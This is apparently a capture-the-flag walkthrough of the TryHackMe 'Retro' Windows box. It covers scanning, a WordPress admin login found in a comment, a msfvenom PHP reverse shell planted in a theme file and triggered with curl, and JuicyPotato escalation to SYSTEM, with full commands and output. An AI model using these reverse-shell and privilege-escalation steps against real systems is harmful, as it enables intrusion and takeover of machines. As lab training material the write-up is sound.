Retro for CTF of wordpress

Retro is a free Windows box offered .

What you’ll learn

• Importance of different wordlists
• Consequence of SeImpersonatePrivilege

Port scans

One thing I noticed with is that the openvpn tunnel created is a tun0 interface, rather than tap0 or the hypervisor-created eth0. This poses some problems for Unicornscan which seems to work over a network-L2 interface but not a L3 one. This was discussed in a HTB thread here. Unicornscan gave the error

Send exiting main didnt connect, exiting: system error Interrupted system call

Consequently I stuck with masscan, which worked for TCP scans. UDP scans, well are protocol-based and don’t seem to work for most scanners, including nmap (see here for an open TFTP port nmap didn’t detect). nmap is probably your best chance though.

root@Kali:~/TryHackme/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-28 13:32:10 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.208.198
Discovered open port 3389/tcp on 10.10.208.198 

Just two ports. Perfect. TCP service scan here. There seems to be nothing special though, from the nmap results.

Web scans

This seemed to return nothing too.

amap v5.4 (www.thc.org/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode
Protocol on 10.10.208.198:80/tcp matches http
Protocol on 10.10.208.198:80/tcp matches http-apache-2
Protocol on 10.10.208.198:80/tcp matches http-iis
Unidentified ports: none.
amap v5.4 finished at 2020-03-28 21:54:36
root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.198:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 21:55:16 Starting gobuster
===============================================================
===============================================================
2020/03/28 21:56:47 Finished
===============================================================
Routed through Burp, use old header
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt -p http://localhost:8081
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.198:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] Proxy: http://localhost:8081
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 22:04:01 Starting gobuster
===============================================================
===============================================================
2020/03/28 22:08:03 Finished
===============================================================

Took me some time, but apparently the wordlist used I used was insufficient. If I had used /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt instead I would have found this.

root@Kali:~/TryHackme/Retro# gobuster dir -u http://192.168.92.134:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.218.121:80
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/29 14:57:25 Starting gobuster
===============================================================
/retro (Status: 301)
/Retro (Status: 301)
===============================================================
2020/03/29 14:57:43 Finished
===============================================================

That or got the hint somehow that the name of the box could be an important Web path. Further scanning down this path gave

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.121:80/retro -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.208.121:80/retro
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/28 22:15:06 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/03/28 22:16:39 Finished
===============================================================

So we have a WP blog. But for some reason with Burp as proxy I kept getting re-directed to localhost:80 which of course loaded nothing so I had to do this to redirect it back.

root@Kali:~/TryHackme/Retro# ssh -L 80:10.10.208.121:80 localhost
root@localhost's password:
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 28 20:35:25 2020 from ::1

That’s SSH local port forwarding where you connect one of your machine own ports to a remote servers’ other port, like

ssh -L 8080:www.ubuntuforums.org:80 localhost

Now you can visit http://localhost:8080 to go to http://www.ubuntuforums.org:80

After doing this I could visit http://10.10.208.121/retro/wp-admin. If you didn’t encounter this problem don’t do this. After I upgraded Burpsuite, the problem stopped. The site looks like this

Now I had to specify all my scans to direct to localhost:80 Since we have a WP site I did wpscan, which annoyingly upgraded to a freemium model limited to 5 results per day. Results here. This didn’t lead anywhere since the vulnerabilities identified were XSS or required you already had some login access to the WP site.

WordPress login

The only way forward, was to notice this comment.

which said

Wade
December 9, 2019
Leaving myself a note here just in case I forget how to spell it: parzival

If you try it on the WordPress admin login page (/retro/wp-login.php) it works (user: Wade, Password = parzival)

Exploitation

Checking the Users section, we see quickly that Wade is a WP admin. Great.

That means we have rights to edit WP themes and replace it with our own code. Typically the WordPress exploitation to shell vector requres two things.

1. Uploading a reverse Web shell.
2. LFI or able to browse to view that shell.

The theme used is 90’s retro. Going to Apperance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php since that page loads whenever a non-existent Web page is queried on the WP site and it gets redirected there, triggering the reverse shell. But this time, I chose another page, page.php.

Now we just need a PHP reverse shell, so get it via msfvenom.

root@Kali:~/TryHackme/Retro# msfvenom -a php --platform php -p php/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php
No encoder or badchars specified, outputting raw payload
Payload size: 3044 bytes
Saved as: shell.php

Just copy and paste the entire PHP code, overwriting the existing code completely. Don’t leave any of the original code behind. I say this because when I first did it, I couldn’t get the reverse shell to trigger until I completely overwrote it. Ok, now we just need to find a way to view page.php Where could that be?

Now I could access twentynineteen theme readme.txt here

http://10.10.218.121/retro/wp-content/themes/twentynineteen/readme.txt

so I just need to figure out Web path for 90’s Retro theme. After some Googling, I found its Github repo. The URL suggested the path could be /90s-retro/. Accessing http://10.10.218.121/retro/wp-content/themes/90s-retro/readme.txt works! So the uploaded reverse shell would be at http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

root@Kali:~/TryHackme/Retro# curl http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

Our listener (I switched from port 53 to 443 with another shell)

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344
whoami && ipconfig /all
nt authority\iusr
Windows IP Configuration Host Name . . . . . . . . . . . . : RetroWeb Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com eu-west-1.compute.internal
Ethernet adapter Ethernet: Connection-specific DNS Suffix . : eu-west-1.compute.internal Description . . . . . . . . . . . : AWS PV Network Device #0 Physical Address. . . . . . . . . : 02-95-6F-53-23-2E DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred) IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.0.0 Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM Default Gateway . . . . . . . . . : 10.10.0.1 DHCP Server . . . . . . . . . . . : 10.10.0.1 DHCPv6 IAID . . . . . . . . . . . : 100805359 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28 DNS Servers . . . . . . . . . . . : 10.0.0.2 NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred) Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred) Default Gateway . . . . . . . . . : :: DHCPv6 IAID . . . . . . . . . . . : 134217728 DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28 NetBIOS over Tcpip. . . . . . . . : Disabled
Tunnel adapter isatap.eu-west-1.compute.internal: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : eu-west-1.compute.internal Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2 Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes

As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you’re going down that route, I prefer FreeRDP over rdesktop. This command is my go to

root@Kali:~/TryHackme/Retro# xfreerdp /v:10.10.218.121:3389 /u:Wade /p:parzival /size:90%

Where /size scales it to 90% of your desktop resolution. Experiment and see what works for you. Just for the record, I tried other PHP reverse shells such as this and Pentestmonkey’s (replacing with cmd) but it didn’t work. Only msfvenom’s worked for me.

Post-exploitation

There are a few ways to achieve SYSTEM here. The intended method, explained here didn’t work for me. What worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.

whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled

We have SeImpersonatePrivilege privileges. So that means we can use Juicy Potato. Call it like this

JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

We should get a SYSTEM shell

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /priv && ipconfig
whoami /priv && ipconfig
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Windows IP Configuration
Ethernet adapter Ethernet: Connection-specific DNS Suffix . : eu-west-1.compute.internal Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5 IPv4 Address. . . . . . . . . . . : 10.10.218.121 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : 10.10.0.1
Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586 Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2 Default Gateway . . . . . . . . . : ::
Tunnel adapter isatap.eu-west-1.compute.internal: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : eu-west-1.compute.internal